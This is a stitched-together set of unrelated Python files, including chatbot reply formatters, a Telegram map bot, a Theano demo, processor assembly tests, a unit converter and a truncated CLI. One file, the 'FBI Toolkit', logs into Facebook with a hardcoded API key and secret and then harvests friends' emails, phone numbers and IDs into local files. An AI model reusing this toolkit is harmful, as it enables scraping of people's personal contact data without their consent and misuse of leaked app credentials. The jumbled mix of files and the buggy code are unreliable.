            place2 = entities[1]['value']
            return "The distance between " + place1 + " and " + place2 + " is " + str(round(distance, 2)) + "km.\n"

    @staticmethod
    def getTimezoneFormat(timezone, entities):
        """Time-zone reply for the first location."""
        entities = entities['wit$location:location']
        place = entities[0]['value']
        return "The time zone at " + place + " is " + str(timezone[0]) + ".\n"

    @staticmethod
    def getLocalTimeFormat(time, entities):
        """Local-time reply, one line per requested location."""
        entities = entities['wit$location:location']
        response = ""
        for i, location in enumerate(entities):
            response += "The time in " + location['value'] + " is " + str(time[i]) + ".\n"
        return response

    @staticmethod
    def getTimeDifferenceFormat(time, entities):
        """Time-difference reply: here-to-place, or between two places."""
        entities = entities['wit$location:location']
        if len(entities) == 1:
            return "The difference in time from here to " + entities[0]['value'] + " is " + str(time) + ".\n"
        else:
            return "The difference in time between " + entities[0]['value'] + " and " + entities[1]['value'] + " is " + str(time) + ".\n"

    @staticmethod
    def getTemperatureFormat(temps, entities):
        """Temperature reply, one line per location.

        NOTE: the misspelling "celcius" is kept byte-for-byte so existing
        consumers matching the reply text keep working.
        """
        entities = entities['wit$location:location']
        response = ""
        for i, location in enumerate(entities):
            response += "The temperature in " + location['value'] + " is " + str(temps[i]['temp']) + " degrees celcius.\n"
        return response

    @staticmethod
    def getWeatherFormat(weather, entities):
        """Weather reply for the first location."""
        entities = entities['wit$location:location']
        return "The weather in " + entities[0]['value'] + " is " + str(weather) + ".\n"

    @staticmethod
    def getPointOfInterestFormat(POI, entities):
        """POI reply listing the second comma-separated field of each POI string."""
        entities = entities['wit$location:location']
        response = "The POIs in " + entities[0]['value'] + " are "
        for poi in POI:
            # Take the text between the first and second commas of the POI string.
            stringsplitpoint = poi.find(', ') + 2
            response += poi[stringsplitpoint:poi.find(',', stringsplitpoint+1)] + ", "
        response = response[:-2]
        response += ".\n"
        return response
|
from flask import Flask
from flask import render_template
import fbchat
import base64
# NOTE(review): fbchat.Client normally takes (email, password); only the
# email is supplied here, so this login looks incomplete — confirm credentials.
client = fbchat.Client("marikalee15@gmail.com",)
app = Flask(__name__)
@app.route("/")
def main():
return render_template('main.html')
@app.route("/button")
def messageMarika():
friends = client.getUsers("Marika Lee")
friends = client.getUsers("Marika Lee") # return a list of names
friend = friends[0]
sent = client.send(friend.uid, "hello :)")
if sent:
print("Message sent successfully!")
return 'Message sent to Marika.'
if __name__ == "__main__":
app.run()
|
# -*- coding: utf-8 -*-
import os
import requests
import telebot
from flask import Flask, request
from data import TOKEN, bot, HEROKU_APP_NAME, format_kind
from markups import main_markup, back_markup, map_type_markup, geo_type_markup, toponym_markup, results_markup, \
request_markup
from mapAPI import map_api
from getWeather import get_weather
server = Flask(__name__)
PORT = int(os.environ.get('PORT', 5000))
@bot.message_handler(commands=["start"])
def start(message):
bot.send_message(message.chat.id, 'Я бот, работающий с картами и другими инструментами. '
'Получите полное описание по команде "❓ Помощь"',
reply_markup=main_markup)
@bot.message_handler(commands=["help"])
def help(message):
bot.send_message(message.chat.id, '''
Команды:
🧭 *Карта*
*Обязательные параметры:*
geocode/геокод: адрес или координаты объекта
kind/топоним: топонима
place/место: название организации
results/результаты: количество результатов
*Дополнительные параметры:*
l/layer/слой: перечень слоев (спутник, схема, гибрид, траффик)
z/zoom/масштаб: уровень масштабирования (0-17)
s/scale/увеличение: коэффициент увеличения объектов (1.0-4.0)
⛅ *Погода*
Вызовите команду, а затем введите название города
⬅ *Назад*
Возвращает назад
''', parse_mode="Markdown")
@bot.message_handler(commands=["weather"])
def weather(message):
if message is None:
return
bot.send_message(message.chat.id, 'Чтобы узнать погоду, введите название города', reply_markup=back_markup)
bot.register_next_step_handler(message, get_weather)
@bot.message_handler(commands=['map'])
def map_command(message):
    """/map: start the map dialogue by asking for the search type."""
    bot.send_message(message.chat.id, "Выберите тип поиска", reply_markup=map_type_markup)
    bot.register_next_step_handler(message, map_type)
def map_type(message):
    """Dialogue step: branch on the chosen search type (objects / organisations
    / manual entry / back); re-prompts on unrecognised input."""
    text = message.text.strip().lower()
    if text in ["🗻 поиск по объектам", "поиск по объектам", "объекты"]:
        bot.send_message(message.chat.id, "Введите адрес или координаты", reply_markup=back_markup)
        bot.register_next_step_handler(message, geo)
    elif text in ["🏢 поиск по организациям", "поиск по организациям", "организации"]:
        bot.send_message(message.chat.id, "Введите название организации", reply_markup=back_markup)
        bot.register_next_step_handler(message, place)
    elif text in ["⌨ ввести вручную", "ввести вручную", "вручную"]:
        # Manual mode: nothing to do here; parameters come later.
        pass
    elif text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад в главное меню", reply_markup=main_markup)
    else:
        bot.send_message(message.chat.id, "Не удалось распознать тип поиска, попробуйте снова",
                         reply_markup=map_type_markup)
        bot.register_next_step_handler(message, map_type)
def geo(message):
    """Dialogue step: store the geocode the user typed, or step back."""
    REQUEST.pop("geocode", None)
    text = message.text.strip().lower()
    if text not in ["⬅ назад", "назад"]:
        REQUEST["geocode"] = text
        bot.send_message(message.chat.id, "Выберите тип поиска по объектам", reply_markup=geo_type_markup)
        bot.register_next_step_handler(message, geo_type)
    else:
        bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска", reply_markup=map_type_markup)
        bot.register_next_step_handler(message, map_type)
def geo_type(message):
    """Dialogue step: choose between plain object search and nearest-toponym
    search; re-prompts on unrecognised input."""
    text = message.text.strip().lower()
    if text in ["🗻 поиск объектов", "поиск объектов", "объекты"]:
        bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
        bot.register_next_step_handler(message, results)
    elif text in ["🎪 поиск ближайших топонимов к объекту", "поиск ближайших топонимов к объекту", "топонимы"]:
        bot.send_message(message.chat.id, "Выберите вид топонима", reply_markup=toponym_markup)
        bot.register_next_step_handler(message, toponym)
    elif text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад, введите адрес или координаты", reply_markup=back_markup)
        bot.register_next_step_handler(message, geo)
    else:
        bot.send_message(message.chat.id, "Недопустимый тип поиска по объекту, введите снова",
                         reply_markup=geo_type_markup)
        bot.register_next_step_handler(message, geo_type)
def toponym(message):
    """Dialogue step: store the selected toponym kind (translated via
    format_kind), or step back; re-prompts on unknown kinds."""
    REQUEST.pop("kind", None)
    text = message.text.strip().lower()
    if text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска по объектам",
                         reply_markup=geo_type_markup)
        bot.register_next_step_handler(message, geo_type)
    elif text in format_kind:
        REQUEST["kind"] = format_kind[text]
        bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
        bot.register_next_step_handler(message, results)
    else:
        bot.send_message(message.chat.id, "Недопустимый вид топонима, введите снова", reply_markup=toponym_markup)
        bot.register_next_step_handler(message, toponym)
def place(message):
    """Dialogue step: store the organisation name the user typed, or step back."""
    REQUEST.pop("place", None)
    text = message.text.strip().lower()
    if text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска", reply_markup=map_type_markup)
        bot.register_next_step_handler(message, map_type)
        return
    REQUEST["place"] = text
    bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
    bot.register_next_step_handler(message, results)
def results(message):
    """Dialogue step: validate the requested number of results, then ask
    for the optional manual parameters.

    Accepts a digits-only answer; anything else re-prompts.
    """
    REQUEST.pop("results", None)
    text = message.text.strip().lower()
    if text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска",
                         reply_markup=map_type_markup)
        bot.register_next_step_handler(message, map_type)
    elif text.isdigit():
        REQUEST["results"] = text
        # BUG FIX: corrected the typo "поомощью" -> "помощью" in the prompt.
        bot.send_message(message.chat.id, 'Задайте вручную параметры, которые были установлены по умолчанию. '
                                          'Для этого введите их в формате <параметр>=<значение>, перечисляя с '
                                          'помощью ";"',
                         reply_markup=request_markup)
        bot.register_next_step_handler(message, make_request)
    else:
        bot.send_message(message.chat.id, "Недопустимое количество результатов, введите снова",
                         reply_markup=results_markup)
        bot.register_next_step_handler(message, results)
def make_request(message):
    """Final dialogue step: collect optional parameter overrides, run the
    map API and send either an error string or the rendered map image with
    a (possibly truncated) description, then reset the accumulated request.
    """
    global REQUEST
    text = message.text.strip().lower()
    if text in ["⬅ назад", "назад"]:
        bot.send_message(message.chat.id, "Вернулись назад, задайте количество результатов",
                         reply_markup=results_markup)
        bot.register_next_step_handler(message, results)
        return
    elif text not in ["➡ пропустить", "пропустить"]:
        # ROBUSTNESS FIX: split on the first '=' only and skip fragments
        # without one — previously a value containing '=' was truncated and
        # a stray ';' crashed with IndexError.
        for param in text.split(';'):
            key, sep, value = param.partition("=")
            if sep:
                REQUEST[key] = value
    output = map_api.main(";".join(f"{key}={value}" for key, value in REQUEST.items()))
    if isinstance(output, str):
        # The API reported an error message.
        bot.send_message(message.chat.id, output, reply_markup=main_markup)
    else:
        description = []
        for d in output:
            raw = [f"{key}: {value}" for key, value in d.items() if key != 'spn']
            description.append('\n'.join(raw))
        description.insert(0, f'По вашему запросу найдено результатов: {len(description)}:')
        description = '\n\n'.join(description)
        # Telegram caption limit: truncate long descriptions.
        if len(description) > 963:
            description = description[:963] + "...\n...описание слишком длинное, что отобразить его полностью"
        # RESOURCE FIX: close the image file after sending (it leaked before).
        with open("map.png", "rb") as im:
            bot.send_photo(message.chat.id, im, caption=description, reply_markup=main_markup)
    REQUEST = {}
@bot.message_handler(content_types=["text"])
def dialog(message):
text = message.text.strip().lower()
if text in ['⬅ назад', 'назад']:
bot.send_message(message.chat.id, "Нет запущенной комманды на данный момент", reply_markup=main_markup)
elif text in ["🧭 карта", "карта"]:
map_command(message)
elif text in ["⛅ погода", "погода"]:
weather(message)
elif text in ["❓ помощь", "помощь"]:
help(message)
elif text.startswith('/'):
bot.send_message(message.chat.id, f'Нет команды "{text}"', reply_markup=main_markup)
else:
bot.send_message(message.chat.id, "Не удалось обработать запрос", reply_markup=main_markup)
@server.route('/' + TOKEN, methods=['POST'])
def getMessage():
    """Telegram webhook endpoint: decode the update and feed it to the bot."""
    json_string = request.get_data().decode('utf-8')
    update = telebot.types.Update.de_json(json_string)
    bot.process_new_updates([update])
    return "!", 200
@server.route("/")
def webhook():
bot.remove_webhook()
bot.set_webhook(url=f"https://{HEROKU_APP_NAME}.herokuapp.com/{TOKEN}")
return "?", 200
# NOTE(review): REQUEST is the mutable accumulator used by all map handlers,
# but it is only initialised here, when run as a script — under a WSGI runner
# the handlers would hit a NameError; consider module-level REQUEST = {}.
if __name__ == '__main__':
    REQUEST = {}
    server.run(host="0.0.0.0", port=PORT)
|
# coding: utf-8
#__author__ = cmathx
# Demo of Theano `function`: sigmoid activations, multi-output functions,
# and default-valued scalar parameters.
# NOTE(review): Python 2 script, for an old Theano release — `Param` was
# later replaced by `theano.In`; confirm the pinned version before modernizing.
import numpy
from theano import *
import theano.tensor as T
############function(parameters:dmatrix)################
#function1: element-wise logistic sigmoid 1 / (1 + e^-x)
x = T.dmatrix('x')
s = 1 / (1 + T.exp(-x))
logistic = function([x], s)
print logistic([[0, 1], [-1, -2]])
#function2: the same sigmoid via the tanh identity
s2 = (1 + T.tanh(x / 2)) / 2
logistic2 = function([x], s2)
print logistic2([[0, 1], [-1, -2]])
#function(more parameters): one call returning three outputs
a, b = T.dmatrices('a', 'b')
diff = a- b
abs_diff = abs(diff)
diff_squared = diff ** 2
f = function([a, b], [diff, abs_diff, diff_squared])
print f([[1, 1], [1, 1]], [[0, 1], [2, 3]])
############function(parameters:dscalars)################
#function1(default parameters): y defaults to 1 when omitted
x, y = T.dscalars('x', 'y')
z = x + y
f = function([x, Param(y, default = 1)], z)
print f(33)
print f(33, 2)
#function2(default parameters): w can also be passed by its display name
x, y, w = T.dscalars('x', 'y', 'w')
z = (x + y) * w
f = function([x, Param(y, default = 1), Param(w, default = 2, name = 'w_by_name')], z)
print f(33)
print f(33, 2)
print f(33, 0, 1)
print f(33, w_by_name = 1)
|
import os
import requests
import json
import sys
import getpass
import hashlib
def baliho():
print '[+]FBI Tookit'
try:
token =open('token.txt','r').read()
r = requests.get('https://graph.facebook.com/me?/acces_token=' + token)
a = json.loads(r.text)
name = a['name']
n.append(a['name'])
print '''
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`'''
except:
print '''
Informasi FacebooK[FBI]
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
--[Telegram:@Hedy2]--
--[Email:mbiasa736@gmail.com]--
'''
# Python 2 only: force UTF-8 as the default string encoding so the ASCII-art
# banners and API responses print without UnicodeDecodeError.
reload (sys)
sys.setdefaultencoding ( 'utf8' )
n = []  # account name(s) collected from a verified token (see baliho())
def main():
    """Print the version header and the FBI Toolkit banner."""
    print
    print '\t\t[--FBI [Facebook Informasi] (Version 0.01)--]'
    print '\t\t[--Author : WhoMHw --]'
    print '''
Informasi FacebooK[FBI]
 ,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
--[Telegram:@Hedy2]--
--[Email:mbiasa736@gmail.com]--
'''
def perintah():
    """Print the command reference, then verify that `requests` is importable."""
    print '''\tPerintah Catatan
___________ _________
buka_nomor Untuk Mengetahui nomor teman
buka_id Untuk Mengetahui id teman
buka_email Untuk Mengetahui email teman
lihat_id Untuk Melihat Id teman kamu
lihat_email Untuk Melihat Email teman kamu
token Untuk Membuat token
cat_token Untuk Mengetahui token anda
nano_token Untuk anda yang sudah mempunyai token
help Untuk Mengetahui keterangan tools
exit Untuk keluar
clear clear terminal
'''
    # Abort early (with the banner) if the requests dependency is missing.
    try:
        import requests
    except ImportError:
        print '''
TRacking Informasi FacebooK
 ,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
[Kamu belum Install pip2 requests]'''
        sys.exit()
def hedy():
    """Main command prompt: read one command and dispatch to its handler."""
    cek = raw_input('FBI Toolkit>>')
    if cek == 'token':
        token()
    elif cek == 'nano_token':
        nano_token()
    elif cek == 'cat_token':
        cat_token()
    elif cek == 'buka_id':
        buka_id()
    elif cek == 'help':
        help()
    elif cek == 'clear':
        clear()
    elif cek == 'keterangan':
        keterangan()
    elif cek == 'buka_email':
        buka_email()
    elif cek == 'buka_nomor':
        buka_nomor()
    elif cek == 'exit':
        exit()
    elif cek == 'keluar':
        exit()
    elif cek == 'lihat_id':
        lihat_id()
    # NOTE(review): nomor() actually reads the e-mail dump (_mail.txt) and
    # mail() reads the phone dump (_phone.txt) — the helpers are name-swapped,
    # though this dispatch still routes each command to the right file.
    elif cek == 'lihat_email':
        nomor()
    elif cek == 'lihat_nomor':
        mail()
    else:
        print '[?]Perintah tidak ditemukan'
        print '[?]Jika tidak mengerti hubungi admin'
        hedy()
def exit():
    """Print a goodbye message and terminate the process.
    NOTE(review): shadows the builtin exit()."""
    print '[*]Terimakasih telah menggunakan.!'
    sys.exit()
def clear():
    """Clear the terminal (POSIX `clear`), then redraw banner and prompt."""
    print '[?]Mencoba membersihkan layar'
    try:
        print '[*]clear terminal'
        os.system('clear')
        baliho()
        hedy()
    except:
        # Fallback when clearing failed (assumed Windows CMD).
        print '[?]Kamu memakai CMD'
        baliho()
        hedy()
def help():
    """Show the disclaimer box, then redraw banner and prompt.
    NOTE(review): shadows the builtin help()."""
    print '''
+-------------------------------------------+
|_________________Keterangan________________|
| Tools ini mungkin tidak seratus persen |
| Berhasil |
+-------------------------------------------+
'''
    baliho()
    hedy()
def keterangan():
    """Show the same disclaimer box as help(), then banner and prompt."""
    print '''
+-------------------------------------------+
|_________________Keterangan________________|
| Tools ini mungkin tidak seratus persen |
| Berhasil |
+-------------------------------------------+'''
    baliho()
    hedy()
def buka_nomor():
print '[*]Strating Token'
try:
token = open('token.txt','r').read()
print '[+]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan token'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_phone.txt','w' )
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+token)
z = json.loads
try:
out.write( z['mobile_phone'])
except KeyError:
pass
out.close()
print '[*]Sukses mengembail nomor teman'
print '[*] Disave : _phone.txt'
baliho()
hedy()
except KeyboardInterrupt:
print '[!] Stopped'
def buka_email():
print '[*]Strating token'
try:
token = open('token.txt','r').read()
print '[*]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan Token'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
print '[*]Mencari Email teman'
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_mail.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+token)
z = json.loads(x.text)
try:
out.write( z['name'] + ':' + z['email'])
except KeyError:
pass
out.close
print '[+]Sukses Mengambil email teman'
print '[*] Disave : _mail.txt'
sys.exit()
except KeyboardInterrupt:
print '\r[!] Stopped'
hedy()
def buka_id():
print '[*]Strating token'
try:
token = open('token.txt','r').read()
print '[+]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan token'
print '[-]Jika tidak mengerti hubungi pembuat'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_id.txt','w')
for i in a['data']:
out.write(i['name'] + ':' + i['id'])
out.close()
print i['name'] + ':' + i['id']
print '\r[*] sukses mengambil id teman'
print '[*] Disave : _id.txt'
sys.exit()
except KeyboardInterrupt:
print '\r[!] Stopped'
hedy()
def cat_token():
    """Show the saved token, or complain when token.txt is missing."""
    try:
        wibi = open('token.txt','r').read()
        print '[*] Token Kamu !!\n\n' + wibi + '\n'
    except:
        print '[-]Anda belum login'
        print '[?]Hubungi admin jika tidak mengerti'
    hedy()
def lihat_id():
    """Print the previously dumped friend IDs from _id.txt."""
    try:
        id = open('_id.txt','r').read()
        print '[+]Mendapatkan ID'
        print '[*]ID temanmu.!!\n' + id + '\n'
        hedy()
    except:
        print '[-]ID tidak ditemukan'
        print '[-]Jika tidak mengerti hubungi admin'
        hedy()
def nomor():
    """Check that the e-mail dump (_mail.txt) exists.

    NOTE(review): despite its name ("number"), this reads the E-MAIL file,
    and the content is read but never displayed — probably meant to print
    ``nomor`` the way lihat_id() does; confirm intent.
    """
    try:
        nomor = open('_mail.txt','r').read()
        print '[*]Mendapatkan email'
        hedy()
    except:
        print '[-]Email tidak ditemukan'
        print '[-]Jika tidak mengerti hubungi admin'
        hedy()
def mail():
    """Check that the phone dump (_phone.txt) exists.

    NOTE(review): despite its name, this reads the PHONE file and the
    success message says "email"; the content is never displayed either —
    confirm intent.
    """
    try:
        nomor = open('_phone.txt','r').read()
        print '[*]Mendapatkan email'
        hedy()
    except:
        print '[-]Nomor tidak ditemukan'
        print '[-]Jika tidak mengerti hubungi admin'
        hedy()
def nano_token():
print '[*]Jika tidak mengerti hubungi admin'
try:
print '[*]Masukkan token anda'
token = raw_input('[?]Token:')
teks = open('token.txt', 'w')
teks.write(token)
except:
print '[-}Masukkan token'
hedy()
def token():
print '[*] login aku fb ';id = raw_input('[?] Username : ');pwd = getpass.getpass('[?] Password : ');API_SECRET = '62f8ce9f74b12f84c123cc23437a4a32';data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"};sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.0'+API_SECRET
x = hashlib.new('md5')
x.update(sig)
data.update({'sig':x.hexdigest()})
get(data)
def get(data):
    """POST the signed login payload to the legacy REST endpoint and save
    the returned access token to token.txt."""
    print '[*] Membuat token'
    try:
        os.mkdir('cookie')
    except OSError:
        pass
    b = open('token.txt','w')
    try:
        r = requests.get('https://api.facebook.com/restserver.php',params=data)
        a = json.loads(r.text)
        b.write(a['access_token'])
        b.close()
        print '[*] success memperoleh token'
        print '[*] Tokenmu tersimpan Di token.txt'
        exit()
    except KeyError:
        # Login failed: no access_token in the response; drop the empty file.
        print '[!] Gagal mengambil token'
        print '[!] tolong cek nomor sama password'
        os.remove('token.txt')
        sys.exit()
# Start-up sequence: banner, command list, then the interactive prompt.
main()
perintah()
hedy()
|
#=========================================================================
# pisa_inst_xcel_test.py
#=========================================================================
import pytest
import random
import pisa_encoding
from pymtl import Bits
from PisaSim import PisaSim
from pisa_inst_test_utils import *
#-------------------------------------------------------------------------
# gen_basic_asm_test
#-------------------------------------------------------------------------
def gen_basic_test():
  """Round-trip one value through the accelerator (mtx then mfx), padded
  with nops so no bypassing/stalling is exercised."""
  return """
    mfc0 r2, mngr2proc < 1
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    mtx r2, r0
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    mfx r3, r0
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    mtc0 r3, proc2mngr > 1
  """
#-------------------------------------------------------------------------
# gen_bypass_mtx_test
#-------------------------------------------------------------------------
def gen_bypass_mtx_test():
  """Shrink the nop padding before mtx (3, 2, 1, 0) to exercise bypassing
  of the mtx source operand."""
  return """
    mfc0 r2, mngr2proc < 0xdeadbeef
    {nops_3}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_7}
    mtc0 r3, proc2mngr > 0xdeadbeef
    mfc0 r2, mngr2proc < 0x0a0a0a0a
    {nops_2}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_7}
    mtc0 r3, proc2mngr > 0x0a0a0a0a
    mfc0 r2, mngr2proc < 0x0b0b0b0b
    {nops_1}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_7}
    mtc0 r3, proc2mngr > 0x0b0b0b0b
    mfc0 r2, mngr2proc < 0x0c0c0c0c
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_7}
    mtc0 r3, proc2mngr > 0x0c0c0c0c
  """.format(
    nops_7=gen_nops(7),
    nops_3=gen_nops(3),
    nops_2=gen_nops(2),
    nops_1=gen_nops(1)
  )
#-------------------------------------------------------------------------
# gen_bypass_mfx_test
#-------------------------------------------------------------------------
def gen_bypass_mfx_test():
  """Shrink the nop padding after mfx (3, 2, 1, 0) to exercise bypassing
  of the mfx destination value into mtc0."""
  return """
    mfc0 r2, mngr2proc < 0xdeadbeef
    {nops_7}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_3}
    mtc0 r3, proc2mngr > 0xdeadbeef
    mfc0 r2, mngr2proc < 0x0a0a0a0a
    {nops_7}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_2}
    mtc0 r3, proc2mngr > 0x0a0a0a0a
    mfc0 r2, mngr2proc < 0x0b0b0b0b
    {nops_7}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    {nops_1}
    mtc0 r3, proc2mngr > 0x0b0b0b0b
    mfc0 r2, mngr2proc < 0x0c0c0c0c
    {nops_7}
    mtx r2, r0
    {nops_7}
    mfx r3, r0
    mtc0 r3, proc2mngr > 0x0c0c0c0c
  """.format(
    nops_7=gen_nops(7),
    nops_3=gen_nops(3),
    nops_2=gen_nops(2),
    nops_1=gen_nops(1)
  )
#-------------------------------------------------------------------------
# gen_bypass_test
#-------------------------------------------------------------------------
def gen_bypass_test():
  """Shrink the padding between mtx and mfx (3, 2, 1, 0) to exercise the
  accelerator round-trip with minimal spacing."""
  return """
    mfc0 r2, mngr2proc < 0xdeadbeef
    mtx r2, r0
    {nops_3}
    mfx r3, r0
    mtc0 r3, proc2mngr > 0xdeadbeef
    mfc0 r2, mngr2proc < 0x0a0a0a0a
    mtx r2, r0
    {nops_2}
    mfx r3, r0
    mtc0 r3, proc2mngr > 0x0a0a0a0a
    mfc0 r2, mngr2proc < 0x0b0b0b0b
    mtx r2, r0
    {nops_1}
    mfx r3, r0
    mtc0 r3, proc2mngr > 0x0b0b0b0b
    mfc0 r2, mngr2proc < 0x0c0c0c0c
    mtx r2, r0
    mfx r3, r0
    mtc0 r3, proc2mngr > 0x0c0c0c0c
  """.format(
    nops_3=gen_nops(3),
    nops_2=gen_nops(2),
    nops_1=gen_nops(1)
  )
#-------------------------------------------------------------------------
# test_basic
#-------------------------------------------------------------------------
@pytest.mark.parametrize( "name,test", [
asm_test( gen_basic_test ),
asm_test( gen_bypass_mtx_test ),
asm_test( gen_bypass_mfx_test ),
asm_test( gen_bypass_test ),
])
def test( name, test ):
sim = PisaSim( trace_en=True )
sim.load( pisa_encoding.assemble( test() ) )
sim.run()
|
from tkinter import *
def miles_to_km():
    """Convert the miles value typed in e1 to kilometres and append to t1.

    BUG FIX: the original divided by 1.6, which converts km -> miles; a
    miles -> km conversion must MULTIPLY (1 mile = 1.609344 km).
    """
    km = float(e1_value.get()) * 1.609344
    t1.insert(END, km)
# Build the one-row UI: [Calculate Km button][miles entry][result text box].
window= Tk()
e1_value=StringVar()  # bound to the miles entry field
e1=Entry(window,textvariable=e1_value)
e1.grid(row=0,column=1)
t1=Text(window,height=1,width=35)
t1.insert(END,"Km Values: ")
t1.grid(row=0,column=2)
b1=Button(window,text="Calculate Km",command=miles_to_km)
b1.grid(row=0,column=0)
window.mainloop()  # blocks until the window is closed
|
import argparse
import sys
import yaml
from .mlgen_code import code_generate
import os
import pkg_resources
import json
def main():
    """CLI entry point: parse arguments and hand them to genfiles()."""
    parser = argparse.ArgumentParser(description="Generate machine learning files in either python or jupyter notebook formats",formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # BUG FIX: '--info' is used as a boolean flag ('if args.info:') but was
    # declared as a value-taking option, so plain 'mlgen --info' errored out;
    # action='store_true' restores the intended behaviour.
    parser.add_argument('--info', action='store_true',
                        help='information and additional resources of cli',
                        )
    parser.add_argument('--init','-i', type=str,
                        help='initialize files',metavar='init')
    parser.add_argument('--gen','-g', type=str,
                        help='generate ML model\'s mlm files')
    parser.add_argument('--backend','-be', type=str,
                        help='backend ML framework used to generate files')
    parser.add_argument('--type','-t', type=str, default = 'python',
                        help='python or jupyter file being generated')
    parser.add_argument('--run','-r', type=str,
                        help='run mlm file to generate python code')
    args = parser.parse_args()
    # genfiles() returns None for most paths; str() makes that explicit in
    # the output ("None") — kept for backward compatibility.
    sys.stdout.write(str(genfiles(args)))
def createfile(name):
    """Create an empty <name>.mlm and record that filename in mlm.json."""
    print("creating files")
    # Touch the (empty) mlm file.
    open(f"{name}.mlm", 'w+').close()
    meta = {'filename': f'{name}.mlm'}
    with open('mlm.json', 'w') as handle:
        json.dump(meta, handle, sort_keys=True, indent=4)
    print("file name", meta)
    return "creating"
def readfile():
    """Return the tracked mlm filename recorded in mlm.json."""
    print("reading files")
    with open("mlm.json", 'r') as handle:
        meta = json.load(handle)
    print(meta['filename'])
    return meta['filename']
def genfiles(args):
    """Execute the actions requested on the command line.

    Handles, in order: ``--info`` (banner + project links), ``--init``
    (create a new .mlm project), ``--run`` (generate code from the .mlm
    file) and ``--gen`` (copy a bundled template for the chosen network
    type and backend into the project's .mlm file).

    Always returns an empty string, which the caller prints.

